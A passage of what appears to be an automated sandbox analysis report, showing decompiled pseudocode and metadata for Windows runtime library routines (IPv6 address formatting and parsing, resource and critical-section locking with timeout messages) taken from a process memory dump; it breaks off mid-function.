                                                        0x00ba2389
                                                        0x00ba238e
                                                        0x00ba2390
                                                        0x00b65378
                                                        0x00b6537c
                                                        0x00ba2396
                                                        0x00ba2396
                                                        0x00ba2397
                                                        0x00ba239c
                                                        0x00ba23a2
                                                        0x00ba23a3
                                                        0x00ba23a6
                                                        0x00ba23ab
                                                        0x00ba23ad
                                                        0x00000000
                                                        0x00ba23b3
                                                        0x00ba23b3
                                                        0x00ba23b4
                                                        0x00ba23b9
                                                        0x00ba23ba
                                                        0x00ba23ba
                                                        0x00ba23bc
                                                        0x00ba23bf
                                                        0x00000000
                                                        0x00000000
                                                        0x00b99153
                                                        0x00b99158
                                                        0x00b9915a
                                                        0x00b9915e
                                                        0x00b99160
                                                        0x00000000
                                                        0x00b99166
                                                        0x00b99166
                                                        0x00b99171
                                                        0x00b99176
                                                        0x00b99176
                                                        0x00000000
                                                        0x00b99160
                                                        0x00ba23c6
                                                        0x00ba23ce
                                                        0x00ba23d7
                                                        0x00ba23d7
                                                        0x00ba23ad
                                                        0x00ba2390
                                                        0x00ba2373
                                                        0x00ba233f
                                                        0x00ba233f
                                                        0x00000000
                                                        0x00ba233f
                                                        0x00ba2291
                                                        0x00ba2291
                                                        0x00ba2293
                                                        0x00ba2295
                                                        0x00ba229a
                                                        0x00ba22a1
                                                        0x00ba22a3
                                                        0x00ba22a7
                                                        0x00ba22a9
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba22ab
                                                        0x00ba22ad
                                                        0x00ba22af
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba22af
                                                        0x00ba22b1
                                                        0x00ba22b4
                                                        0x00ba22b4
                                                        0x00ba22b6
                                                        0x00b653be
                                                        0x00b653be
                                                        0x00b653be
                                                        0x00b653c0
                                                        0x00000000
                                                        0x00000000
                                                        0x00b653cb
                                                        0x00b653ce
                                                        0x00b653d0
                                                        0x00b653d4
                                                        0x00b653d6
                                                        0x00000000
                                                        0x00b653d8
                                                        0x00b653e3
                                                        0x00b653ea
                                                        0x00b653ea
                                                        0x00000000
                                                        0x00b653d6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba22b6
                                                        0x00000000
                                                        0x00ba228f
                                                        0x00ba2349
                                                        0x00ba234d
                                                        0x00ba2251
                                                        0x00ba2251
                                                        0x00000000
                                                        0x00ba2251
                                                        0x00ba21a4
                                                        0x00ba21a4
                                                        0x00ba21a6
                                                        0x00ba21a8
                                                        0x00ba21ac
                                                        0x00ba21b6
                                                        0x00ba21b8
                                                        0x00ba21bc
                                                        0x00ba21be
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba21c0
                                                        0x00ba21c2
                                                        0x00ba21c4
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba21c4
                                                        0x00ba21c6
                                                        0x00ba21c6
                                                        0x00ba21c8
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba21c8
                                                        0x00ba21a2
                                                        0x00000000
                                                        0x00ba2183
                                                        0x00b8057b
                                                        0x00b8057d
                                                        0x00b80581
                                                        0x00b80583
                                                        0x00ba2178
                                                        0x00000000
                                                        0x00b80589
                                                        0x00b8058f
                                                        0x00b8058f
                                                        0x00b80583
                                                        0x00000000

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BA2206
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-4236105082
                                                        • Opcode ID: 11001be3ece9dacbb97872bbf7829fe4a24a2c44ac2975a09b936c8b440b9f47
                                                        • Instruction ID: a7caabe5570d2202f66f74593141e0a2203afa546c32e10283c65fdb73b131d6
                                                        • Opcode Fuzzy Hash: 11001be3ece9dacbb97872bbf7829fe4a24a2c44ac2975a09b936c8b440b9f47
                                                        • Instruction Fuzzy Hash: A2510635B042116FEF149B18CC81FA673E9EF95720F2142A9FD55EB286DA61EC4187A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 64%
                                                        			E00B814C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                        				signed int _v8;
                                                        				char _v10;
                                                        				char _v140;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t24;
                                                        				void* _t26;
                                                        				signed int _t29;
                                                        				signed int _t34;
                                                        				signed int _t40;
                                                        				intOrPtr _t45;
                                                        				void* _t51;
                                                        				intOrPtr* _t52;
                                                        				void* _t54;
                                                        				signed int _t57;
                                                        				void* _t58;
                                                        
                                                        				_t51 = __edx;
                                                        				_t24 =  *0xc22088; // 0x76fbb2c1
                                                        				_v8 = _t24 ^ _t57;
                                                        				_t45 = _a16;
                                                        				_t53 = _a4;
                                                        				_t52 = _a20;
                                                        				if(_a4 == 0 || _t52 == 0) {
                                                        					L10:
                                                        					_t26 = 0xc000000d;
                                                        				} else {
                                                        					if(_t45 == 0) {
                                                        						if( *_t52 == _t45) {
                                                        							goto L3;
                                                        						} else {
                                                        							goto L10;
                                                        						}
                                                        					} else {
                                                        						L3:
                                                        						_t28 =  &_v140;
                                                        						if(_a12 != 0) {
                                                        							_push("[");
                                                        							_push(0x41);
                                                        							_push( &_v140);
                                                        							_t29 = E00B77707();
                                                        							_t58 = _t58 + 0xc;
                                                        							_t28 = _t57 + _t29 * 2 - 0x88;
                                                        						}
                                                        						_t54 = E00B813CB(_t53, _t28);
                                                        						if(_a8 != 0) {
                                                        							_t34 = E00B77707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                        							_t58 = _t58 + 0x10;
                                                        							_t54 = _t54 + _t34 * 2;
                                                        						}
                                                        						if(_a12 != 0) {
                                                        							_t40 = E00B77707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                        							_t58 = _t58 + 0x10;
                                                        							_t54 = _t54 + _t40 * 2;
                                                        						}
                                                        						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                        						 *_t52 = _t53;
                                                        						if( *_t52 < _t53) {
                                                        							goto L10;
                                                        						} else {
                                                        							E00B42340(_t45,  &_v140, _t53 + _t53);
                                                        							_t26 = 0;
                                                        						}
                                                        					}
                                                        				}
                                                        				return E00B4E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                        			}

                                                        APIs
                                                        • ___swprintf_l.LIBCMT ref: 00BAEA22
                                                          • Part of subcall function 00B813CB: ___swprintf_l.LIBCMT ref: 00B8146B
                                                          • Part of subcall function 00B813CB: ___swprintf_l.LIBCMT ref: 00B81490
                                                        • ___swprintf_l.LIBCMT ref: 00B8156D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$]:%u
                                                        • API String ID: 48624451-3050659472
                                                        • Opcode ID: 39a2f9f4879e5a0294eac70a0e5438064c9fc8cc0bd766899bf7ec1a1662c120
                                                        • Instruction ID: 24da8c14b709117b394c08821b95cc1e599ea28d1d8c439ce11dd26511082cdc
                                                        • Opcode Fuzzy Hash: 39a2f9f4879e5a0294eac70a0e5438064c9fc8cc0bd766899bf7ec1a1662c120
                                                        • Instruction Fuzzy Hash: B4218F72901219ABCB20EE58CC41AEF73ECEB60700F4449A6F856E3151DB70EE59CBE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 45%
                                                        			E00B653A5(signed int _a4, char _a8) {
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t32;
                                                        				signed int _t37;
                                                        				signed int _t40;
                                                        				signed int _t42;
                                                        				void* _t45;
                                                        				intOrPtr _t46;
                                                        				void* _t48;
                                                        				signed int _t49;
                                                        				void* _t51;
                                                        				signed int _t57;
                                                        				signed int _t64;
                                                        				signed int _t71;
                                                        				void* _t74;
                                                        				intOrPtr _t78;
                                                        				signed int* _t79;
                                                        				void* _t85;
                                                        				signed int _t86;
                                                        				signed int _t92;
                                                        				void* _t104;
                                                        				void* _t105;
                                                        
                                                        				_t64 = _a4;
                                                        				_t32 =  *(_t64 + 0x28);
                                                        				_t71 = _t64 + 0x28;
                                                        				_push(_t92);
                                                        				if(_t32 < 0) {
                                                        					_t78 =  *[fs:0x18];
                                                        					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                        					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                        						goto L3;
                                                        					} else {
                                                        						__eflags = _t32 | 0xffffffff;
                                                        						asm("lock xadd [ecx], eax");
                                                        						return 1;
                                                        					}
                                                        				} else {
                                                        					L3:
                                                        					_push(_t86);
                                                        					while(1) {
                                                        						L4:
                                                        						__eflags = _t32;
                                                        						if(_t32 == 0) {
                                                        							break;
                                                        						}
                                                        						__eflags = _a8;
                                                        						if(_a8 == 0) {
                                                        							__eflags = 0;
                                                        							return 0;
                                                        						} else {
                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                        							_t79 = _t64 + 0x24;
                                                        							_t71 = 1;
                                                        							asm("lock xadd [eax], ecx");
                                                        							_t32 =  *(_t64 + 0x28);
                                                        							_a4 = _t32;
                                                        							__eflags = _t32;
                                                        							if(_t32 != 0) {
                                                        								L19:
                                                        								_t86 = 0;
                                                        								__eflags = 0;
                                                        								while(1) {
                                                        									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                        									asm("sbb esi, esi");
                                                        									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00c201c0;
                                                        									_push(_t92);
                                                        									_push(0);
                                                        									_t37 = E00B3F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                        									__eflags = _t37 - 0x102;
                                                        									if(_t37 != 0x102) {
                                                        										break;
                                                        									}
                                                        									_t71 =  *(_t92 + 4);
                                                        									_t85 =  *_t92;
                                                        									_t51 = E00B84FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                        									_push(_t85);
                                                        									_push(_t51);
                                                        									E00B93F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                        									E00B93F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                        									_t86 = _t86 + 1;
                                                        									_t105 = _t104 + 0x28;
                                                        									__eflags = _t86 - 2;
                                                        									if(__eflags > 0) {
                                                        										E00BC217A(_t71, __eflags, _t64);
                                                        									}
                                                        									_push("RTL: Re-Waiting\n");
                                                        									_push(0);
                                                        									_push(0x65);
                                                        									E00B93F92();
                                                        									_t104 = _t105 + 0xc;
                                                        								}
                                                        								__eflags = _t37;
                                                        								if(__eflags < 0) {
                                                        									_push(_t37);
                                                        									E00B83915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                        									asm("int3");
                                                        									_t40 =  *_t71;
                                                        									 *_t71 = 0;
                                                        									__eflags = _t40;
                                                        									if(_t40 == 0) {
                                                        										L1:
                                                        										_t42 = E00B65384(_t92 + 0x24);
                                                        										if(_t42 != 0) {
                                                        											goto L31;
                                                        										} else {
                                                        											goto L2;
                                                        										}
                                                        									} else {
                                                        										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                        										_push( &_a4);
                                                        										_push(_t40);
                                                        										_t49 = E00B3F970( *((intOrPtr*)(_t92 + 0x18)));
                                                        										__eflags = _t49;
                                                        										if(__eflags >= 0) {
                                                        											goto L1;
                                                        										} else {
                                                        											_push(_t49);
                                                        											E00B83915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                        											L31:
                                                        											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                        											_push( &_a4);
                                                        											_push(1);
                                                        											_t42 = E00B3F970( *((intOrPtr*)(_t92 + 0x20)));
                                                        											__eflags = _t42;
                                                        											if(__eflags >= 0) {
                                                        												L2:
                                                        												return _t42;
                                                        											} else {
                                                        												_push(_t42);
                                                        												E00B83915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                        												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                        												_push( &_a4);
                                                        												_push(1);
                                                        												_t42 = E00B3F970( *((intOrPtr*)(_t92 + 0x20)));
                                                        												__eflags = _t42;
                                                        												if(__eflags >= 0) {
                                                        													goto L2;
                                                        												} else {
                                                        													_push(_t42);
                                                        													_t45 = E00B83915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                        													asm("int3");
                                                        													while(1) {
                                                        														_t74 = _t45;
                                                        														__eflags = _t45 - 1;
                                                        														if(_t45 != 1) {
                                                        															break;
                                                        														}
                                                        														_t86 = _t86 | 0xffffffff;
                                                        														_t45 = _t74;
                                                        														asm("lock cmpxchg [ebx], edi");
                                                        														__eflags = _t45 - _t74;
                                                        														if(_t45 != _t74) {
                                                        															continue;
                                                        														} else {
                                                        															_t46 =  *[fs:0x18];
                                                        															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                        															return _t46;
                                                        														}
                                                        														goto L38;
                                                        													}
                                                        													E00B65329(_t74, _t92);
                                                        													_push(1);
                                                        													_t48 = E00B653A5(_t92);
                                                        													return _t48;
                                                        												}
                                                        											}
                                                        										}
                                                        									}
                                                        								} else {
                                                        									_t32 =  *(_t64 + 0x28);
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								_t71 =  *_t79;
                                                        								__eflags = _t71;
                                                        								if(__eflags > 0) {
                                                        									while(1) {
                                                        										_t57 = _t71;
                                                        										asm("lock cmpxchg [edi], esi");
                                                        										__eflags = _t57 - _t71;
                                                        										if(_t57 == _t71) {
                                                        											break;
                                                        										}
                                                        										_t71 = _t57;
                                                        										__eflags = _t57;
                                                        										if(_t57 > 0) {
                                                        											continue;
                                                        										}
                                                        										break;
                                                        									}
                                                        									_t32 = _a4;
                                                        									__eflags = _t71;
                                                        								}
                                                        								if(__eflags != 0) {
                                                        									continue;
                                                        								} else {
                                                        									goto L19;
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L38;
                                                        					}
                                                        					_t71 = _t71 | 0xffffffff;
                                                        					_t32 = 0;
                                                        					asm("lock cmpxchg [edx], ecx");
                                                        					__eflags = 0;
                                                        					if(0 != 0) {
                                                        						goto L4;
                                                        					} else {
                                                        						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                        						return 1;
                                                        					}
                                                        				}
                                                        				L38:
                                                        			}



























                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BA22F4
                                                        Strings
                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00BA22FC
                                                        • RTL: Re-Waiting, xrefs: 00BA2328
                                                        • RTL: Resource at %p, xrefs: 00BA230B
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-871070163
                                                        • Opcode ID: 04795226803d40a11de22a2c54467bed1ae3ea09657f8e4327f4ee2edc09ab4f
                                                        • Instruction ID: 59c328a0296db1369822e90fe5bfe265a233080739f0c4cadaebcd71ab0620e8
                                                        • Opcode Fuzzy Hash: 04795226803d40a11de22a2c54467bed1ae3ea09657f8e4327f4ee2edc09ab4f
                                                        • Instruction Fuzzy Hash: 1E5128716007026BDF24EB28CC81FA673E8EF55B60F2042A9FD45DB281E665ED41C7A4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 51%
                                                        			E00B6EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				signed int _v24;
                                                        				intOrPtr* _v28;
                                                        				intOrPtr _v32;
                                                        				signed int _v36;
                                                        				intOrPtr _v40;
                                                        				short _v66;
                                                        				char _v72;
                                                        				void* __esi;
                                                        				intOrPtr _t38;
                                                        				intOrPtr _t39;
                                                        				signed int _t40;
                                                        				intOrPtr _t42;
                                                        				intOrPtr _t43;
                                                        				signed int _t44;
                                                        				void* _t46;
                                                        				intOrPtr _t48;
                                                        				signed int _t49;
                                                        				intOrPtr _t50;
                                                        				intOrPtr _t53;
                                                        				signed char _t67;
                                                        				void* _t72;
                                                        				intOrPtr _t77;
                                                        				intOrPtr* _t80;
                                                        				intOrPtr _t84;
                                                        				intOrPtr* _t85;
                                                        				void* _t91;
                                                        				void* _t92;
                                                        				void* _t93;
                                                        
                                                        				_t80 = __edi;
                                                        				_t75 = __edx;
                                                        				_t70 = __ecx;
                                                        				_t84 = _a4;
                                                        				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                        					E00B5DA92(__ecx, __edx, __eflags, _t84);
                                                        					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                        				}
                                                        				_push(0);
                                                        				__eflags = _t38 - 0xffffffff;
                                                        				if(_t38 == 0xffffffff) {
                                                        					_t39 =  *0xc2793c; // 0x0
                                                        					_push(0);
                                                        					_push(_t84);
                                                        					_t40 = E00B416C0(_t39);
                                                        				} else {
                                                        					_t40 = E00B3F9D4(_t38);
                                                        				}
                                                        				_pop(_t85);
                                                        				__eflags = _t40;
                                                        				if(__eflags < 0) {
                                                        					_push(_t40);
                                                        					E00B83915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                        					asm("int3");
                                                        					while(1) {
                                                        						L21:
                                                        						_t76 =  *[fs:0x18];
                                                        						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                        						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                        							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                        							_v66 = 0x1722;
                                                        							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                        							_t76 =  &_v72;
                                                        							_push( &_v72);
                                                        							_v28 = _t85;
                                                        							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                        							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                        							_push(0x10);
                                                        							_push(0x20402);
                                                        							E00B401A4( *0x7ffe0382 & 0x000000ff);
                                                        						}
                                                        						while(1) {
                                                        							_t43 = _v8;
                                                        							_push(_t80);
                                                        							_push(0);
                                                        							__eflags = _t43 - 0xffffffff;
                                                        							if(_t43 == 0xffffffff) {
                                                        								_t71 =  *0xc2793c; // 0x0
                                                        								_push(_t85);
                                                        								_t44 = E00B41F28(_t71);
                                                        							} else {
                                                        								_t44 = E00B3F8CC(_t43);
                                                        							}
                                                        							__eflags = _t44 - 0x102;
                                                        							if(_t44 != 0x102) {
                                                        								__eflags = _t44;
                                                        								if(__eflags < 0) {
                                                        									_push(_t44);
                                                        									E00B83915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                        									asm("int3");
                                                        									E00BC2306(_t85);
                                                        									__eflags = _t67 & 0x00000002;
                                                        									if((_t67 & 0x00000002) != 0) {
                                                        										_t7 = _t67 + 2; // 0x4
                                                        										_t72 = _t7;
                                                        										asm("lock cmpxchg [edi], ecx");
                                                        										__eflags = _t67 - _t67;
                                                        										if(_t67 == _t67) {
                                                        											E00B6EC56(_t72, _t76, _t80, _t85);
                                                        										}
                                                        									}
                                                        									return 0;
                                                        								} else {
                                                        									__eflags = _v24;
                                                        									if(_v24 != 0) {
                                                        										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                        									}
                                                        									return 2;
                                                        								}
                                                        								goto L36;
                                                        							}
                                                        							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                        							_push(_t67);
                                                        							_t46 = E00B84FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                        							_push(_t77);
                                                        							E00B93F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                        							_t48 =  *_t85;
                                                        							_t92 = _t91 + 0x18;
                                                        							__eflags = _t48 - 0xffffffff;
                                                        							if(_t48 == 0xffffffff) {
                                                        								_t49 = 0;
                                                        								__eflags = 0;
                                                        							} else {
                                                        								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                        							}
                                                        							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                        							_push(_t49);
                                                        							_t50 = _v12;
                                                        							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                        							_push(_t85);
                                                        							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                        							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                        							E00B93F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                        							_t53 =  *_t85;
                                                        							_t93 = _t92 + 0x20;
                                                        							_t67 = _t67 + 1;
                                                        							__eflags = _t53 - 0xffffffff;
                                                        							if(_t53 != 0xffffffff) {
                                                        								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                        								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                        							}
                                                        							__eflags = _t67 - 2;
                                                        							if(_t67 > 2) {
                                                        								__eflags = _t85 - 0xc220c0;
                                                        								if(_t85 != 0xc220c0) {
                                                        									_t76 = _a4;
                                                        									__eflags = _a4 - _a8;
                                                        									if(__eflags == 0) {
                                                        										E00BC217A(_t71, __eflags, _t85);
                                                        									}
                                                        								}
                                                        							}
                                                        							_push("RTL: Re-Waiting\n");
                                                        							_push(0);
                                                        							_push(0x65);
                                                        							_a8 = _a4;
                                                        							E00B93F92();
                                                        							_t91 = _t93 + 0xc;
                                                        							__eflags =  *0x7ffe0382;
                                                        							if( *0x7ffe0382 != 0) {
                                                        								goto L21;
                                                        							}
                                                        						}
                                                        						goto L36;
                                                        					}
                                                        				} else {
                                                        					return _t40;
                                                        				}
                                                        				L36:
                                                        			}

                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 00BA24FA
                                                        • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00BA248D
                                                        • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00BA24BD
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                        • API String ID: 0-3177188983
                                                        • Opcode ID: c88c6a3913eb58f4c8c219d573805429d47886b2237742f5fde63de770a327bc
                                                        • Instruction ID: 8caa7a34571428725caaf516ab4cd1ad3a7d44c9cbfd2dca76bfe5f6739d8642
                                                        • Opcode Fuzzy Hash: c88c6a3913eb58f4c8c219d573805429d47886b2237742f5fde63de770a327bc
                                                        • Instruction Fuzzy Hash: 1641E570A04204AFDB24EB68CCC5F6A77E8EF49720F208695F6659B3D1D734EA41C761
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00B7FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				signed int _v16;
                                                        				signed int _v20;
                                                        				signed int _v24;
                                                        				signed int _v28;
                                                        				signed int _t105;
                                                        				void* _t110;
                                                        				char _t114;
                                                        				short _t115;
                                                        				void* _t118;
                                                        				signed short* _t119;
                                                        				short _t120;
                                                        				char _t122;
                                                        				void* _t127;
                                                        				void* _t130;
                                                        				signed int _t136;
                                                        				intOrPtr _t143;
                                                        				signed int _t158;
                                                        				signed short* _t164;
                                                        				signed int _t167;
                                                        				void* _t170;
                                                        
                                                        				_t158 = 0;
                                                        				_t164 = _a4;
                                                        				_v20 = 0;
                                                        				_v24 = 0;
                                                        				_v8 = 0;
                                                        				_v12 = 0;
                                                        				_v16 = 0;
                                                        				_v28 = 0;
                                                        				_t136 = 0;
                                                        				while(1) {
                                                        					_t167 =  *_t164 & 0x0000ffff;
                                                        					if(_t167 == _t158) {
                                                        						break;
                                                        					}
                                                        					_t118 = _v20 - _t158;
                                                        					if(_t118 == 0) {
                                                        						if(_t167 == 0x3a) {
                                                        							if(_v12 > _t158 || _v8 > _t158) {
                                                        								break;
                                                        							} else {
                                                        								_t119 =  &(_t164[1]);
                                                        								if( *_t119 != _t167) {
                                                        									break;
                                                        								}
                                                        								_t143 = 2;
                                                        								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                        								_v28 = 1;
                                                        								_v8 = _t143;
                                                        								_t136 = _t136 + 1;
                                                        								L47:
                                                        								_t164 = _t119;
                                                        								_v20 = _t143;
                                                        								L14:
                                                        								if(_v24 == _t158) {
                                                        									L19:
                                                        									_t164 =  &(_t164[1]);
                                                        									_t158 = 0;
                                                        									continue;
                                                        								}
                                                        								if(_v12 == _t158) {
                                                        									if(_v16 > 4) {
                                                        										L29:
                                                        										return 0xc000000d;
                                                        									}
                                                        									_t120 = E00B7EE02(_v24, _t158, 0x10);
                                                        									_t170 = _t170 + 0xc;
                                                        									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                        									_t136 = _t136 + 1;
                                                        									goto L19;
                                                        								}
                                                        								if(_v16 > 3) {
                                                        									goto L29;
                                                        								}
                                                        								_t122 = E00B7EE02(_v24, _t158, 0xa);
                                                        								_t170 = _t170 + 0xc;
                                                        								if(_t122 > 0xff) {
                                                        									goto L29;
                                                        								}
                                                        								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                        								goto L19;
                                                        							}
                                                        						}
                                                        						L21:
                                                        						if(_v8 > 7 || _t167 >= 0x80) {
                                                        							break;
                                                        						} else {
                                                        							if(E00B7685D(_t167, 4) == 0) {
                                                        								if(E00B7685D(_t167, 0x80) != 0) {
                                                        									if(_v12 > 0) {
                                                        										break;
                                                        									}
                                                        									_t127 = 1;
                                                        									_a7 = 1;
                                                        									_v24 = _t164;
                                                        									_v20 = 1;
                                                        									_v16 = 1;
                                                        									L36:
                                                        									if(_v20 == _t127) {
                                                        										goto L19;
                                                        									}
                                                        									_t158 = 0;
                                                        									goto L14;
                                                        								}
                                                        								break;
                                                        							}
                                                        							_a7 = 0;
                                                        							_v24 = _t164;
                                                        							_v20 = 1;
                                                        							_v16 = 1;
                                                        							goto L19;
